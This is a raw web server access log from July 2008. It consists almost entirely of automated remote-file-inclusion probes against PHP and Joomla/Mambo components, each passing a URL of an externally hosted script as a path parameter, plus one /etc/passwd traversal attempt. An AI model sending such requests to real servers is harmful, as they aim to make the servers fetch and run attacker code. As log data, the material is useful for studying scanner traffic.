212.227.101.81 - - [26/Jul/2008:05:00:40 -0700] "GET /logs/access_080717.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:01:54 -0700] "GET /logs/access.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:01:55 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:01:55 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.hellionindustries.com"
63.208.74.34 - - [26/Jul/2008:05:02:08 -0700] "GET /logs/access.log/?sourcedir=http://69.13.92.203/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
63.208.74.34 - - [26/Jul/2008:05:02:08 -0700] "GET /?sourcedir=http://69.13.92.203/sistem.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.hellionindustries.com"
63.208.74.34 - - [26/Jul/2008:05:02:08 -0700] "GET /logs/?sourcedir=http://69.13.92.203/sistem.txt?? HTTP/1.1" 200 1653 "-" "libwww-perl/5.79" "www.hellionindustries.com"
63.208.74.34 - - [26/Jul/2008:05:02:17 -0700] "GET /logs/access_080715.log/?sourcedir=http://69.13.92.203/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
212.227.101.81 - - [26/Jul/2008:05:02:29 -0700] "GET /logs/access.log//include/lib.inc.php?site_path=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.hellionindustries.com"
212.227.101.81 - - [26/Jul/2008:05:02:30 -0700] "GET //include/lib.inc.php?site_path=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.hellionindustries.com"
212.227.101.81 - - [26/Jul/2008:05:02:30 -0700] "GET /logs//include/lib.inc.php?site_path=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.hellionindustries.com"
195.13.58.250 - - [26/Jul/2008:05:02:59 -0700] "GET /logs/access_080715.log/?sourcedir=http://www.zoltis.com/faq/attachments/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.hellionindustries.com"
200.11.67.242 - - [26/Jul/2008:05:04:24 -0700] "GET /?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.65" "www.hellionindustries.com"
194.79.75.195 - - [26/Jul/2008:05:04:51 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.geocities.com/elmaningrum/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.hellionindustries.com"
194.79.75.195 - - [26/Jul/2008:05:04:51 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.geocities.com/elmaningrum/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.hellionindustries.com"
212.227.101.81 - - [26/Jul/2008:05:04:51 -0700] "GET /logs/access.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.hellionindustries.com"
212.227.101.81 - - [26/Jul/2008:05:04:52 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.hellionindustries.com"
212.227.101.81 - - [26/Jul/2008:05:04:52 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.hellionindustries.com"
87.244.11.20 - - [26/Jul/2008:05:05:14 -0700] "GET /logs//PHP_CON/Exchange/include.php?webappcfg[APPPATH]=http://br.geocities.com/kaizoku_56/Fla/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.hellionindustries.com"
87.244.11.20 - - [26/Jul/2008:05:05:15 -0700] "GET //PHP_CON/Exchange/include.php?webappcfg[APPPATH]=http://br.geocities.com/kaizoku_56/Fla/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.hellionindustries.com"
193.111.11.7 - - [26/Jul/2008:05:05:37 -0700] "GET /logs/access.log/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
193.111.11.7 - - [26/Jul/2008:05:05:39 -0700] "GET /?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.hellionindustries.com"
193.111.11.7 - - [26/Jul/2008:05:05:41 -0700] "GET /logs/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 1653 "-" "libwww-perl/5.805" "www.hellionindustries.com"
87.244.11.20 - - [26/Jul/2008:05:07:03 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://br.geocities.com/kaizoku_56/Fla/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.hellionindustries.com"
87.244.11.20 - - [26/Jul/2008:05:07:03 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://br.geocities.com/kaizoku_56/Fla/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.hellionindustries.com"
87.244.11.20 - - [26/Jul/2008:05:07:09 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://br.geocities.com/kaizoku_56/Fla/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.hellionindustries.com"
87.244.11.20 - - [26/Jul/2008:05:07:09 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://br.geocities.com/kaizoku_56/Fla/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.hellionindustries.com"
205.234.252.183 - - [26/Jul/2008:05:07:17 -0700] "GET /include/bbs.lib.inc.php?site_path=http://growlibear.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.hellionindustries.com"
205.234.252.183 - - [26/Jul/2008:05:07:17 -0700] "GET /logs/include/bbs.lib.inc.php?site_path=http://growlibear.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.hellionindustries.com"
216.246.46.184 - - [26/Jul/2008:05:07:20 -0700] "GET /logs/access_080716.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
216.246.46.184 - - [26/Jul/2008:05:07:20 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
216.246.46.184 - - [26/Jul/2008:05:07:20 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
194.79.75.195 - - [26/Jul/2008:05:08:02 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://rotihidup.com/components/com_rss/ma??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.hellionindustries.com"
194.79.75.195 - - [26/Jul/2008:05:08:02 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://rotihidup.com/components/com_rss/ma??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.hellionindustries.com"
72.3.138.50 - - [26/Jul/2008:05:08:07 -0700] "GET /logs/access_080716.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://mfmparty.com/ray/modules/global/inc/aidi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.hellionindustries.com"
72.3.138.50 - - [26/Jul/2008:05:08:07 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://mfmparty.com/ray/modules/global/inc/aidi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.hellionindustries.com"
72.3.138.50 - - [26/Jul/2008:05:08:08 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://mfmparty.com/ray/modules/global/inc/aidi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.hellionindustries.com"
193.111.11.7 - - [26/Jul/2008:05:08:15 -0700] "GET /logs/access_080715.log/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
87.244.11.20 - - [26/Jul/2008:05:08:19 -0700] "GET //accounts/inc/include.php?language=0&lang_settings[0][1]=http://br.geocities.com/kaizoku_56/Fla/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.hellionindustries.com"
87.244.11.20 - - [26/Jul/2008:05:08:19 -0700] "GET /logs//accounts/inc/include.php?language=0&lang_settings[0][1]=http://br.geocities.com/kaizoku_56/Fla/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.hellionindustries.com"
216.246.46.184 - - [26/Jul/2008:05:08:30 -0700] "GET /logs/access_080717.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
194.85.90.172 - - [26/Jul/2008:05:08:31 -0700] "GET /logs/access.log/http://www.holsteinerverband.info//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=/../../../../../../../../etc/passwdhttp://www.geocities.com/anangedan.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
59.125.211.84 - - [26/Jul/2008:05:08:47 -0700] "GET /logs/access_080717.log/index.php?stranica=http://www.kke.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
59.125.211.84 - - [26/Jul/2008:05:08:48 -0700] "GET /index.php?stranica=http://www.kke.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
59.125.211.84 - - [26/Jul/2008:05:08:50 -0700] "GET /logs/index.php?stranica=http://www.kke.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
80.67.26.157 - - [26/Jul/2008:05:09:35 -0700] "GET /logs/?DOCUMENT_ROOT=http://www.lametaradio.com/scripts/v6id.txt???? HTTP/1.1" 200 1653 "-" "libwww-perl/5.808" "www.hellionindustries.com"
80.67.26.157 - - [26/Jul/2008:05:09:36 -0700] "GET /?DOCUMENT_ROOT=http://www.lametaradio.com/scripts/v6id.txt???? HTTP/1.1" 200 779 "-" "libwww-perl/5.808" "www.hellionindustries.com"
98.130.2.24 - - [26/Jul/2008:05:10:11 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://carderz.net76.net/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
98.130.2.24 - - [26/Jul/2008:05:10:11 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://carderz.net76.net/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
98.130.2.24 - - [26/Jul/2008:05:10:11 -0700] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://carderz.net76.net/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
85.234.133.173 - - [26/Jul/2008:05:10:36 -0700] "GET /logs/access_080716.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.hellionindustries.com"
85.234.133.173 - - [26/Jul/2008:05:10:36 -0700] "GET /logs/access_080716.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.hellionindustries.com"
85.234.133.173 - - [26/Jul/2008:05:10:36 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.hellionindustries.com"
85.234.133.173 - - [26/Jul/2008:05:10:36 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.hellionindustries.com"
85.234.133.173 - - [26/Jul/2008:05:10:37 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.hellionindustries.com"
85.234.133.173 - - [26/Jul/2008:05:10:37 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.hellionindustries.com"
72.3.138.50 - - [26/Jul/2008:05:10:46 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://mfmparty.com/ray/modules/global/inc/aidi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.hellionindustries.com"
72.3.138.50 - - [26/Jul/2008:05:10:46 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://mfmparty.com/ray/modules/global/inc/aidi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.hellionindustries.com"
72.3.138.50 - - [26/Jul/2008:05:10:50 -0700] "GET /logs/access.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://mfmparty.com/ray/modules/global/inc/aidi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.hellionindustries.com"
72.3.138.50 - - [26/Jul/2008:05:10:50 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://mfmparty.com/ray/modules/global/inc/aidi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.hellionindustries.com"
72.3.138.50 - - [26/Jul/2008:05:10:50 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://mfmparty.com/ray/modules/global/inc/aidi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.hellionindustries.com"
98.130.2.24 - - [26/Jul/2008:05:10:55 -0700] "GET /logs/access_080715.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://carderz.net76.net/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
59.125.211.84 - - [26/Jul/2008:05:11:07 -0700] "GET /index.php?stranica=http://www.kke.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
87.244.11.20 - - [26/Jul/2008:05:11:37 -0700] "GET //accounts/inc/include.php?language=0&lang_settings[0][1]=http://br.geocities.com/kaizoku_56/Fla/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "hellionindustries.com"
87.244.11.20 - - [26/Jul/2008:05:11:37 -0700] "GET /logs//accounts/inc/include.php?language=0&lang_settings[0][1]=http://br.geocities.com/kaizoku_56/Fla/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "hellionindustries.com"
58.65.228.5 - - [26/Jul/2008:05:13:23 -0700] "GET /logs/access.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.usedomonline.de/hpmaker/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
69.9.36.146 - - [26/Jul/2008:05:13:27 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.bapeda-jabar.go.id/UserFiles/Image/baru/splash.me.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
69.9.36.146 - - [26/Jul/2008:05:13:27 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.bapeda-jabar.go.id/UserFiles/Image/baru/splash.me.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:13:31 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.brazebo.it/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:13:31 -0700] "GET //modules/xfsection/modify.php?dir_module=http://www.brazebo.it/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.hellionindustries.com"
213.219.217.44 - - [26/Jul/2008:05:14:39 -0700] "GET /logs/access_080717.log/errors.php?error=http://www.freewebs.com/albgroup/1d/Hid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.hellionindustries.com"
213.219.217.44 - - [26/Jul/2008:05:14:39 -0700] "GET /errors.php?error=http://www.freewebs.com/albgroup/1d/Hid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.hellionindustries.com"
213.219.217.44 - - [26/Jul/2008:05:14:40 -0700] "GET /logs/errors.php?error=http://www.freewebs.com/albgroup/1d/Hid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:16:08 -0700] "GET /logs/access.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:16:08 -0700] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.hellionindustries.com"
82.194.66.70 - - [26/Jul/2008:05:16:24 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
82.194.66.70 - - [26/Jul/2008:05:16:24 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
213.219.217.44 - - [26/Jul/2008:05:16:45 -0700] "GET /logs/access.log/errors.php?error=http://www.freewebs.com/albgroup/1d/Hid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.hellionindustries.com"
65.182.184.197 - - [26/Jul/2008:05:16:56 -0700] "GET //?mosConfig_absolute_path=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 200 779 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.hellionindustries.com"
65.182.184.197 - - [26/Jul/2008:05:16:56 -0700] "GET /logs//?mosConfig_absolute_path=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 200 1658 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.hellionindustries.com"
65.182.184.197 - - [26/Jul/2008:05:16:58 -0700] "GET /logs/access.log//?mosConfig_absolute_path=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.hellionindustries.com"
85.234.133.173 - - [26/Jul/2008:05:17:02 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.hellionindustries.com"
85.234.133.173 - - [26/Jul/2008:05:17:02 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.hellionindustries.com"
85.234.133.173 - - [26/Jul/2008:05:17:03 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.hellionindustries.com"
85.234.133.173 - - [26/Jul/2008:05:17:03 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.hellionindustries.com"
65.98.67.106 - - [26/Jul/2008:05:17:10 -0700] "GET /logs/access.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/fjr1938/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.hellionindustries.com"
65.98.67.106 - - [26/Jul/2008:05:17:10 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/fjr1938/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.hellionindustries.com"
65.98.67.106 - - [26/Jul/2008:05:17:10 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/fjr1938/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.hellionindustries.com"
208.80.193.27 - - [26/Jul/2008:05:17:17 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; YComp 5.0.2.4)" "hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:17:33 -0700] "GET /logs/access.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:17:33 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:17:33 -0700] "GET /logs/access.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:17:33 -0700] "GET /logs/access.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:17:33 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:17:33 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:17:33 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:17:33 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:17:33 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:17:40 -0700] "GET /logs/access_080716.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:17:40 -0700] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:17:40 -0700] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.hellionindustries.com"
72.3.138.50 - - [26/Jul/2008:05:17:51 -0700] "GET /logs/access.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://mfmparty.com/ray/modules/global/inc/aidi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:18:05 -0700] "GET /logs/access.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:18:06 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:18:06 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:18:41 -0700] "GET /logs/access.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:18:41 -0700] "GET /logs/access.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:18:41 -0700] "GET /logs/access.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:18:42 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:18:42 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:18:42 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
